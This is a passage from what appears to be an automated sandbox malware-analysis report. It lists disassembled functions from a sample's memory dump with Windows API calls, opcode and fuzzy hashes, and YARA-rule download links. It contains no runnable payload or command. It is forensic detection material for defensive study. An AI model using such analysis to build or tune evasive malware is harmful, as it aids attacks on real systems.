                                                                                                                                        • timeGetTime.WINMM ref: 0077F57A
                                                                                                                                          • Part of subcall function 0076E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E279
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 007D75D3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1792118007-0
                                                                                                                                        • Opcode ID: 0ddbec3db6b58d17fa47a8ff790cba18d435c4845ce47e960a7af522999d2b57
                                                                                                                                        • Instruction ID: c9b8b52d8d1395051f08c807d5d759b4ba06dc551bdf91b5798e21b5df6c0b4a
                                                                                                                                        • Opcode Fuzzy Hash: 0ddbec3db6b58d17fa47a8ff790cba18d435c4845ce47e960a7af522999d2b57
                                                                                                                                        • Instruction Fuzzy Hash: 2AF08C71200218AFD314EF79D849BA6BBE8AF49360F00402AF85ACB351EB74AC10CBD1
                                                                                                                                        Function 00774040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                        • Instruction ID: 1b2c7bb5bf8f203461522ac97f7c6bc20273791b80b021f6db048300c3967dba
                                                                                                                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                        • Instruction Fuzzy Hash: 4F61A070A0020ADFCB10EF64C884A7AB7E5FF19350F54C269E91A87691E738ED95CB91
                                                                                                                                        Function 0077EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5ff46670ad73f7e953e72015997b1efb2b4483c72d2b37c5fac89bc65fccd9e1
                                                                                                                                        • Instruction ID: cbac70228fb9896e0c6cca49ed5dad5e6b729fe484be3cca81e8e6650e948c73
                                                                                                                                        • Opcode Fuzzy Hash: 5ff46670ad73f7e953e72015997b1efb2b4483c72d2b37c5fac89bc65fccd9e1
                                                                                                                                        • Instruction Fuzzy Hash: 8051A175700104EFCF14EF68C9A9EAD77B5AF49350B1480A9F90A9B392DB38ED01DB50
                                                                                                                                        Function 0076B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                        • Instruction ID: 41d2959e3a5902f06c3ac8c9881f4a640722b32bd69d6e96075e092851a00a39
                                                                                                                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                        • Instruction Fuzzy Hash: E1417B79200602DFD724AF19C491962F7E0FF8A361714C42AED9BCB761DB34E892CB51
                                                                                                                                        Function 007D8135 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: d7fa6e4996d02662b5dabebed2188796295c26d700fe4fb8fdd933a27571d709
                                                                                                                                        • Instruction ID: b555ae8cce2283e65e1adfce948bc7da919be0943857b908745f2a9b438e210e
                                                                                                                                        • Opcode Fuzzy Hash: d7fa6e4996d02662b5dabebed2188796295c26d700fe4fb8fdd933a27571d709
                                                                                                                                        • Instruction Fuzzy Hash: 35415C34900509DFCF10DF48C488AA9B7B1FB05390F98C526E84D9B265D73DEE96DB91
                                                                                                                                        Function 00764EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00764F8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 6f2d05c3fc10864383ca8d9664a3346b642d924627380c64173ccb084587c9a5
                                                                                                                                        • Instruction ID: ec23c65b22e3bb214aa37e6ba0e2741c116fba75b141b6eb7b127fc5d7c5759d
                                                                                                                                        • Opcode Fuzzy Hash: 6f2d05c3fc10864383ca8d9664a3346b642d924627380c64173ccb084587c9a5
                                                                                                                                        • Instruction Fuzzy Hash: A9314A31A0061AEFCB18DF6DD484AADB7B5BF48310F188629EC1A97710D778B990CB90
                                                                                                                                        Function 0077F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: select
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction ID: 2ada88cfbf7d8b79bdd34a2d3b4ee97abf2655d35368b367bfdae1735b37be19
                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction Fuzzy Hash: DA310671A04106ABCB08DF58C680A69FBA1FF49384B24C2A5E54DCB255D734EDC1DFD0
                                                                                                                                        Function 007DAA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: d4f30b31e48e61e59155f5d2ea786ece0240700b5c8b73b04d60efb5e3af3cc2
                                                                                                                                        • Instruction ID: 89a48c73e44407c17d08dbecc53dcaf4a5734087e9ffdf5fbb47ffafdf3a379a
                                                                                                                                        • Opcode Fuzzy Hash: d4f30b31e48e61e59155f5d2ea786ece0240700b5c8b73b04d60efb5e3af3cc2
                                                                                                                                        • Instruction Fuzzy Hash: 94415B70504641CFDB24CF18C488B1ABBE1BF45354F1985ACE99A4B362C339EC85CF92
                                                                                                                                        Function 00764D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 4ade50fab690dc66cd8aad200f87916fcc1089b87d7e4f6814e1e11c55b544f8
                                                                                                                                        • Instruction ID: 75b69c4e0e4f609194b4274133b0a8f3a2d007846d42c0d9cd276821127b62e3
                                                                                                                                        • Opcode Fuzzy Hash: 4ade50fab690dc66cd8aad200f87916fcc1089b87d7e4f6814e1e11c55b544f8
                                                                                                                                        • Instruction Fuzzy Hash: 8B21E4B0A00608EBCF109F51EC486AE7BF9FF56360F22C86EE486D5250EB3895E0D755
                                                                                                                                        Function 0076D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                        • Instruction ID: f2e496ff8779f2cdafa2dded7fe2854fab0f14f4c14848237060484bb9f42df4
                                                                                                                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                        • Instruction Fuzzy Hash: FE111C75600606DFD724DF28D585916B7E9FF49364720C42EE88ECB661E736E841CB90
                                                                                                                                        Function 00763F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00763F90
                                                                                                                                          • Part of subcall function 00784129: __wfsopen.LIBCMT ref: 00784134
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007634E2,?,00000001), ref: 00763FCD
                                                                                                                                          • Part of subcall function 00763E78: FreeLibrary.KERNEL32(00000000), ref: 00763EAB
                                                                                                                                          • Part of subcall function 00764010: _memmove.LIBCMT ref: 0076405A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1396898556-0
                                                                                                                                        • Opcode ID: 92bba4f8ea169b9acd43380fc56ae2a0661a93f04dfc6097b7521dc368affe05
                                                                                                                                        • Instruction ID: bd327375e8d969b7c3188f54defd9dc8d2f3c1170cc7d5b716f30e3ef398b119
                                                                                                                                        • Opcode Fuzzy Hash: 92bba4f8ea169b9acd43380fc56ae2a0661a93f04dfc6097b7521dc368affe05
                                                                                                                                        • Instruction Fuzzy Hash: 54119131600219EADB24AF64DC1AB9E76A9AF50B00F108829F943EB1C1DF7D9E05DB60
                                                                                                                                        Function 007DAB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 90678450a95b21af0cbcef4e40aee44e41f0b6316509ab29146c252858b1ec69
                                                                                                                                        • Instruction ID: 9f8e452bf12cd68106c6465fcacd773c73bb4ae07081c211eae27229555f95d6
                                                                                                                                        • Opcode Fuzzy Hash: 90678450a95b21af0cbcef4e40aee44e41f0b6316509ab29146c252858b1ec69
                                                                                                                                        • Instruction Fuzzy Hash: 7E212A70508645CFDB24DF24C448A1ABBE1BF89344F158968EA9A4B362C339E845DF92
                                                                                                                                        Function 007C10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: 042377c8f0e177c82e592bf9772d62be461d05b4b4a629796c18cc009e30725b
                                                                                                                                        • Instruction ID: 188fdbe18237fb02171dfd6f8cdd593b6248580471eaead06d09dafd0e018ffd
                                                                                                                                        • Opcode Fuzzy Hash: 042377c8f0e177c82e592bf9772d62be461d05b4b4a629796c18cc009e30725b
                                                                                                                                        • Instruction Fuzzy Hash: 30118F36201219DFDB10DF18C880E9A77E5FF4A760B49817EED498F352DB38AD418B91
                                                                                                                                        Function 00764CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00764E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00764CF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: d2f2107e2a3ff6cde79fe00d7aae7c03ba3c27454ca7a566debf9faa9481dc44
                                                                                                                                        • Instruction ID: 2498350364645295882050525bb0aaf41ba91b132bf579113751d4eac3cae321
                                                                                                                                        • Opcode Fuzzy Hash: d2f2107e2a3ff6cde79fe00d7aae7c03ba3c27454ca7a566debf9faa9481dc44
                                                                                                                                        • Instruction Fuzzy Hash: 78115731202B449FD720DF16C880F66B7E9AF44314F10C81EEAAB8AA50C7B9E844DB60
                                                                                                                                        Function 00764D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
